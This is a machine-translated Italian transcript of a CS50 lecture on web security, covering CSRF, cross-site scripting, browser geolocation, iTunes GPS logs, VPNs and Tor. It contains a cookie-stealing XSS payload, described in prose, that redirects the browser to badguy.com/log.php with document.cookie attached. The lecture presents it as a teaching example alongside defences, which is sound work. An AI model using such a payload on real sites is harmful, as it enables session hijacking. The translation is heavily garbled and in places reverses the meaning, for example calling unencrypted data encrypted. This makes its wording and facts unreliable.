Fanno una ricerca sul tuo numero di telefono e poi dire, oh, questo è David. Mi permetta di iniettare un identificatore univoco in modo che i nostri inserzionisti o chi può tenere traccia di questo. Quindi, questo è in realtà molto, molto, molto cattivo e terrificante. E io vi incoraggio a un'occhiata, per esempio, a questo indirizzo, che dovrei disconoscere In realtà ho provato questo questa mattina. Ho scritto un piccolo script, metterlo a questo URL, visitato con la mia Verizon cellulare dopo aver acceso il Wi-Fi. In modo da avere per attivare il Wi-Fi off in modo che si sta utilizzando 3G o LTE o simili. E poi, se si visita questo URL, tutto questo script fa per voi ragazzi, se vuoi giocare, si sputa fuori quello che le intestazioni HTTP il telefono sta inviando al nostro server. E io in realtà, in tutta onestà, fatto Non vedere questo questa mattina, che mi fa pensare sia il locale torre cellulare sono stato collegato a o roba del genere non lo fa, o che hanno marcia indietro di farlo temporaneamente. Ma per ulteriori informazioni, a testa per questo URL qui. 

E ora a Questa poi questo comico potrebbe avere senso. No? Ok. Bene. Che è morto. Bene. 

Quindi, diamo un'occhiata a un paio di più attacchi, se non altro per far conoscere e quindi offrire una coppia possibili soluzioni in modo che siate sempre più consapevoli. Questo abbiamo parlato l'altro giorno, ma non ha dato un nome. Si tratta di una richiesta di falso cross-site, che è un modo troppo elegante per dire si ingannare un utente a fare clic su un URL come questo, che li trucchi in qualche comportamento che non intendevano. 

In questo caso, questo sembra per cercare di ingannare me a vendere le mie azioni di Google. E questo avrà successo se Io, il programmatore di pset7, non hanno fatto che cosa? O meglio, più in generale, in quanto casi si è esposti ad un attacco se qualcuno trucchi un altro utente in clic su un URL come questo? Sì? 

PUBBLICO: Non distinguere tra GET e POST. 

DAVID J. MALAN: Good. Se noi non distinguiamo tra GET e POST, e in effetti, se permettiamo GET per la vendita di cose, stiamo invitando questo tipo di attacco. Ma abbiamo comunque potuto mitigare in qualche modo. E ho commentato, credo, la settimana scorsa che Amazon almeno cerca di ridurre questo con una tecnica questo è abbastanza semplice. Cosa sarebbe una cosa intelligente per fare essere sul server, piuttosto che ciecamente vendita qualunque sia il simbolo che l'utente digita in? PUBBLICO: Conferma di sorta? DAVID J. MALAN: una schermata di conferma, qualcosa che coinvolge l'interazione umana in modo che io sono costretto a effettuare la chiamata in giudizio, anche se ho ingenuamente cliccato un legame che assomiglia a questo e mi ha portato alla schermata delle cellule, a almeno mi ha chiesto di confermare o smentire. Ma non è un attacco raro, soprattutto nel cosiddetto phishing o spam-like attacchi. 

Ora, questo è un po 'più sottile. Si tratta di un attacco di scripting cross-site. E questo accade se la vostra sito web non utilizza l'equivalente di htmlspecialchars. E sta prendendo l'input dell'utente e solo ciecamente iniettare in una pagina web, come con la stampa o eco, with-- again-- fuori chiamando qualcosa come htmlspecialchars. 

Quindi supponiamo che il sito in domanda è vulnerable.com. E supponiamo che accetta un parametro chiamato q. Guardate quello che potrebbe accadere se io in realtà, un cattivo ragazzo, digitare o ingannare l'utente a visitare un URL che sembra questo-- q = tag script aperto, chiuso tag script. E ancora, sto assumendo che vulnerable.com non è andando a girare pericoloso personaggi come parentesi aperte in entità HTML, il commerciale, L-T, cosa e virgola che si potrebbe avere visto prima. 

Ma ciò che è lo script o il codice JavaScript Sto cercando di ingannare un utente in esecuzione? Beh, si riferisce document.location di indirizzo attuale del mio browser. Quindi, se io faccio document.location =, questo mi permette di reindirizzare l'utente in JavaScript per un altro sito. E 'come la nostra funzione PHP reindirizzare, ma fatto in JavaScript. 

Dove sto cercando di inviare l'utente? Beh, a quanto pare, badguy.com/log.php, che è un po 'lo script, a quanto pare, il cattivo ha scritto, che prende un parametro chiamato biscotto. 

E notate, che cosa devo sembrano essere concatenando sulla fine di quel segno di uguale? Beh, una cosa che dice document.cookie. Non abbiamo parlato di questo. Ma si scopre, in JavaScript, proprio come in PHP, si può accedere a tutti i cookie che il browser sia in realtà utilizzando. 

Quindi, l'effetto di questa linea di codice, se un utente è indotti a cliccare su questo link e il sito web vulnerable.com non lo fa fuggire con htmlspecialchars, è che basta in modo efficace caricati log.php tutti i cookie. E non è sempre quello problematico, a meno che uno di quei biscotti è il tuo ID di sessione, il tuo cosiddetta timbro mano, che significa badguy.com può fare la propria Richieste HTTP, l'invio di quella stessa mano timbro, la stessa intestazione di cookie, e accedere a qualunque sito web si fosse in visita, che in questo caso è vulnerable.com. Si tratta di un cross-site scripting attacco nel senso che si sta sorta di ingannare un sito in racconto un altro sito web su alcune informazioni non deve, infatti, avere accesso. 

Va bene, pronto per una altro dettaglio preoccupante? D'accordo, il mondo è un luogo spaventoso, legittimamente così. Ecco un semplice JavaScript esempio che è nel codice sorgente di oggi chiamato geolocalizzazione 0 e 1. E ci sono un paio procedure dettagliate online per questo. 

E lo fa il seguente se aprire questa pagina web in Chrome. E prima non fa nulla. OK, proveremo di nuovo. Oh. No, dovrebbe fare qualcosa. OK, stand by. 

Proviamo questo ancora una volta. [Incomprensibile] Ah, OK, non so perché the-- oh, l'apparecchio probabilmente perso internet accesso per qualche motivo. Va bene, così accade anche a me. 

Va bene, così avviso cosa sta succedendo qui. Questo criptico dall'aspetto URL, che è solo uno dei server di CS50, vuole utilizzare il mio computer posizione, come fisicamente significa. E se, in effetti, clicco su Consenti, vediamo cosa succede. A quanto pare, questo è il mio latitudine e longitudinali coordina verso il basso ad una davvero buona risoluzione. 

Così come ho fatto ad arrivare a questo? Come funziona questo sito, come server di CS50, so fisicamente dove nel mondo Io sono, e tanto meno con quella precisione. Beh, si trasforma fuori-- facciamo solo guardare sorgente-- della pagina che qui è un po 'di HTML fondo che ha prima questo-- body onload = "Geolocalizza" - solo una funzione che ho scritto. 

E io sto dicendo, sul caricamento la pagina, chiamata Geolocalizza. E poi non c'è niente nel corpo, perché nella testa della pagina, notare ciò che ho qui. Ecco la mia funzione Geolocalizza. E questo è solo un errore checking-- se il tipo di navigator.geolocation non è definito. Così JavaScript ha questo meccanismo in cui si può dire, qual è il tipo di questa variabile? E se non è undefined-- che significa che è un po 'value-- Io vado a chiamare navigator.geolocation.getCurrentPosition e poi callback. 

Che cos'è questo? Quindi, in generale, che è un callback, tanto per intenderci? Si potrebbe avere incontrato questo già in pset8. Callback è un generico termine per fare che cosa? Sembra solo a me oggi. PUBBLICO: [incomprensibile]. DAVID J. MALAN: Esattamente, una funzione che deve essere chiamato solo quando avremo i dati. Questa chiamata al browser, ottenere la mia attuale posizione, potrebbe richiedere un millisecondo, potrebbe richiedere un minuto. Che cosa questo significa è che stiamo dicendo il metodo get GetCurrentPosition, chiamare questa funzione di callback, che ho chiamato letteralmente callback per semplicità, che a quanto pare è questo qui. 

E il modo GetCurrentPosition funziona, semplicemente leggendo la documentazione per un po 'di codice JavaScript in linea, è che si chiama che i cosiddetti callback funzione, passa in un oggetto JavaScript, all'interno del quale è .coords.latitude e .coords.longitude, che è esattamente come, poi, quando ho ricaricato la pagina, Sono stato in grado di vedere la mia posizione qui. Ora, almeno c'era una difesa qui. Prima ho visitato questa pagina, quando effettivamente lavorate, quello che mi è stato richiamato per almeno? 

PUBBLICO: [incomprensibile]. 

DAVID J. MALAN: Sì o no-- fare si desidera consentire o negare questo? Ma pensa, anche, sulle abitudini voi ragazzi avete probabilmente adottata, sia sui vostri telefoni e il tuo browser. Molti di noi, me inclusi, sono probabilmente abbastanza predisposti questi si days-- vedere un pop-up, basta inserire, OK, approvare, Consenti. E sempre più, si può mettere te a rischio per queste ragioni. 

Quindi, in realtà, c'era questo meraviglioso bug pochi anni ago-- o la mancanza di feature-- che iTunes ha avuto qualche anno fa, per cui, se si ha un telefono cellulare, ed è stato un iPhone, e hai lasciato la tua casa e quindi il giro del mondo o vicino a, tutto questo tempo, il telefono è stato registrando dove ti trovi tramite GPS. E questo è in realtà rivelato, e la gente si aspetta questo tipo di ora. Il telefono sa dove sei. Ma il problema è che, quando eri esegue il backup il telefono per iTunes-- questo era prima i giorni di iCloud, che è per il meglio o per peggio-- veniva memorizzati i dati in iTunes, completamente in chiaro. Quindi, se avete una famiglia o compagni di stanza o un vicino di casa che è dannoso curioso di sapere letteralmente ogni GPS coordinare le è mai stato a, lui o lei potrebbe semplicemente sedersi a iTunes, eseguire qualche software che è stato liberamente disponibili e mappe producono piace questo elemento. 

In realtà, questo è ciò che prodotto del mio telefono. Ho inserito in. E sembra che, in base sui punti blu lì, è lì che la maggior parte dei le coordinate GPS sono stati registrato da iTunes che ho è stato nel nord-est là. Ma a quanto pare ho viaggiato in giro un po ', anche all'interno Massachusetts. 

Ecco, questo è porto di Boston là sulla destra. Questo è il genere di Cambridge e Boston, dove è più buio. E di tanto in tanto, vorrei correre commissioni di una geografia più grande. 

Ma iTunes, per anni, ha avuto, come meglio Potrei dire, tutti questi dati su di me. Si potrebbe dire che, che anno, mi è stato effettivamente viaggiato molto tra Boston e New York, andando avanti e indietro e avanti e indietro. E in effetti, questo sono io su Amtrak, indietro e indietro, avanti e indietro, un bel po '. Tutto questo veniva registrato e conservati crittografato sul mio computer per tutti coloro che potrebbero avere l'accesso al mio computer. 

Questo era preoccupante. Non sapevo perché ero in Pennsylvania o perché il mio telefono era in Pennsylvania, a quanto pare abbastanza densamente. E poi, finalmente, ho guardato al mio Gcal, e, oh, ho visitato CMU, Carnegie Mellon, al momento. E uff, questo tipo di spiegato che blip. E poi, se si esegue lo zoom più lontano, è possibile vedo che ho visitato San Francisco una o più volte poi, e ho anche avuto una sosta in quello che Penso che è Las Vegas, laggiù. Quindi tutti questo-- solo un sosta, in aeroporto. 

PUBBLICO: [risate] 

Quindi questo è solo per dire che questi problemi, onestamente, sono onnipresenti. E ci si sente solo sempre che ci sia sempre di più di questo essere divulgato, che è probabilmente una buona cosa. Oserei dire, il mondo non è sempre peggio a software di scrittura. Stiamo sempre meglio, si spera, a se ne accorga quanto male alcuni software è che stiamo usando. E per fortuna, un po ' aziende stanno cominciando essere ritenuti responsabili per questo. 

Ma che tipo di difese si può avere in mente? Quindi, oltre a gestori di password, come 1Password e LastPass e altri, inoltre solo cambiando le password e venire con quelli casuali utilizzando un software come che, si può anche provare nel miglior modo possibile per crittografare tutto il traffico almeno restringere la zona di una minaccia. Così, per esempio, come affiliati di Harvard, tutto si può andare a vpn.harvard.edu ed effettuare il login con il tuo ID Harvard e il PIN. E questo creerà un sicuro connessione tra voi e Harvard. 

Ora, che non fa necessariamente proteggervi contro le minacce che si trovano tra Harvard e Facebook o Harvard e Gmail. Ma se sei seduto in un aeroporto o sei seduto in Starbucks o sei seduto a casa di un amico, e non ti fidi veramente loro o la loro configurazione del loro router di casa, almeno si può stabilire una connessione sicura ad un soggetto come questo posto che è probabilmente un po 'meglio assicurato di qualcosa di simile a un Starbucks o simili. E ciò che fa è stabilisce, di nuovo, crittografia tra voi e il punto finale. 

Anche amatore sono cose come questa. Così alcuni di voi già potrebbe avere familiarità con Tor, che è questo tipo di trasformazione in forma anonima rete, per cui un sacco di gente, se corrono questo software, percorso successivamente la loro connessione internet traffico attraverso l'altro. Quindi il punto più breve è non più tra A e B. Ma potrebbe essere tutto il posto in modo che si è in sostanza che copre le proprie tracce e lasciando meno di un record da dove il vostro HTTP il traffico è venuto da, perché sta andando attraverso tutta una serie di altre persone computer portatili o desktop, nel bene e nel male. 

Ma anche questo non è una cosa infallibile. Alcuni di voi potrebbero ricordare l'anno scorso l'allarme bomba che è stato chiamato in. Ed è stato rintracciato in ultima analisi, ad un utente che aveva usato questa rete qui. E il fermo lì, se non ricordo male, è, se non ci sono che molte altre persone utilizzando un software come questo o utilizzando questa porta e il protocollo, non è così difficile per una rete a anche capire chi, con una certa probabilità, era in realtà anonimato proprio traffico. 

E io non so se quelli erano il indicazioni attuali in questione. Ma sicuramente, rendersi conto che nessuno di si tratta di soluzioni surefire, pure. E l'obiettivo oggi è di almeno farti pensare a queste cose e venire con tecniche di difendersi contro di loro. Tutte le domande su tutte le minacce che ti aspettano là fuori e qui dentro? Sì? PUBBLICO: Quanto è sicuro fare ci aspettiamo che la media [? sito web per essere,?] come il progetto media CS50? 

DAVID J. MALAN: Il progetto medio CS50? E 'sempre dimostrato ogni anno che alcuni progetti definitivi CS50 non sono particolarmente sicuro. Di solito, si tratta di qualche compagno di stanza o hallmate che le figure questo fuori inviando le richieste al progetto. 

Breve answer-- quanti siti web sono sicuri? Sto raccogliendo su oggi anomalie. Come se fosse solo casualità che mi sono reso conto che questo sito Ho ordinare questi francamente deliziosi arrangiamenti from-- e io non sono sicuro che sarò smettere di usare il loro sito web; Potrei cambiare il mio Password più regularly-- non è chiaro quanto sia vulnerabile tutti questi various-- questo è ricoperto di cioccolato in realtà. La risposta breve, non posso rispondere a questa efficacemente, diversi dirlo non è stato così difficile per me trovare alcuni di questi esempi solo per il bene della discussione in conferenza. E proprio tenendo d'occhio Google News e di altre risorse porterà tanto più di questo genere di cose alla luce. 

Va bene, cerchiamo di concludere con questo prequel che la squadra di CS50 ha preparato per voi in previsione del CS50 Hackathon. E sulla tua via d'uscita in un momento, la frutta sarà servita. [RIPRODUZIONE VIDEO] [MUSICA Fergie, Q punta, e tra me e te, "A Piccola festa non ha mai ucciso NESSUNO (ALL WE GOT) "] 

- [RUSSAMENTO] [FINE RIPRODUZIONE VIDEO] DAVID J. MALAN: Questo è tutto per CS50. Ci vediamo il Mercoledì. [MUSICA - SKRILLEX, "IMMA 'Provalo ora!"]